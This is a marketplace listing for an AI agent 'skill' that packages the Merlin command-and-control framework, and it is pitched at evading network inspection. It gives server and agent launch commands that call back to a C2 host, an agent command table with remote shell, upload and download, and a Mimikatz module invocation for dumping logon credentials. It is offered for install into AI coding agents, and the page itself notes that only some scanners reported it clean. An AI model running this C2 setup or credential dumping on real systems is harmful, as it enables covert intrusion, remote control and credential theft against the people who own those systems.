offensive-tools/c2/merlin/SKILL.md
Cross-platform C2 server using HTTP/2 (h2c), HTTP/3 (QUIC), and DNS transports for covert agent communication. Use when needing a Go-based implant over non-standard encrypted channels to evade network inspection.
npx skillsauth add aeondave/malskill merlinInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
Cross-platform C2 using HTTP/2 and HTTP/3 (QUIC) — Go server + multi-OS agent.
# Download from https://github.com/Ne0nd0g/merlin/releases
# Start server (HTTPS/HTTP2 on 443)
./merlinServer-Linux-x64 -i 0.0.0.0 -p 443 -x509cert server.crt -x509key server.key
# Generate agent
./merlinAgent-Linux-x64 -url https://C2:443/ -psk "passphrase"
| Command | Purpose |
|---------|---------|
| sessions | List connected agents |
| interact <UUID> | Enter agent session |
| use module <path> | Load a module |
| upload <src> <dst> | Upload file to agent |
| download <src> | Download from agent |
| shell <cmd> | Run OS command |
| exit | Terminate agent |
HTTP/3 QUIC listener:
./merlinServer-Linux-x64 -proto h3 -i 0.0.0.0 -p 8443
./merlinAgent-Windows-x64.exe -url https://C2:8443/ -proto h3 -psk "passphrase"
Mimikatz via Merlin module:
interact <UUID>
use module windows/credentials/mimikatz/logonpasswords
run
| File | When to load |
|------|--------------|
| references/ | Transport options and agent build flags |
development
Auth/lab ref: Unicorn Engine CPU-only emulation for shellcode, decryptors, custom VM handlers, instruction tracing, memory hooks, and register-level experiments.
development
Auth/lab ref: Renode board and SoC simulation for MCU/RTOS firmware, UART/GPIO/peripheral modeling, GDB remote debugging, REPL platforms, and RESC scripts.
development
Auth/lab ref: Qiling OS-layer binary emulation for PE/ELF/Mach-O/UEFI/shellcode with rootfs, syscall/API hooks, filesystem mapping, and runtime patching.
databases
Auth/lab ref: QEMU user-mode and full-system emulation for cross-arch binaries, firmware, kernels, disks, serial consoles, networking, and GDB stubs.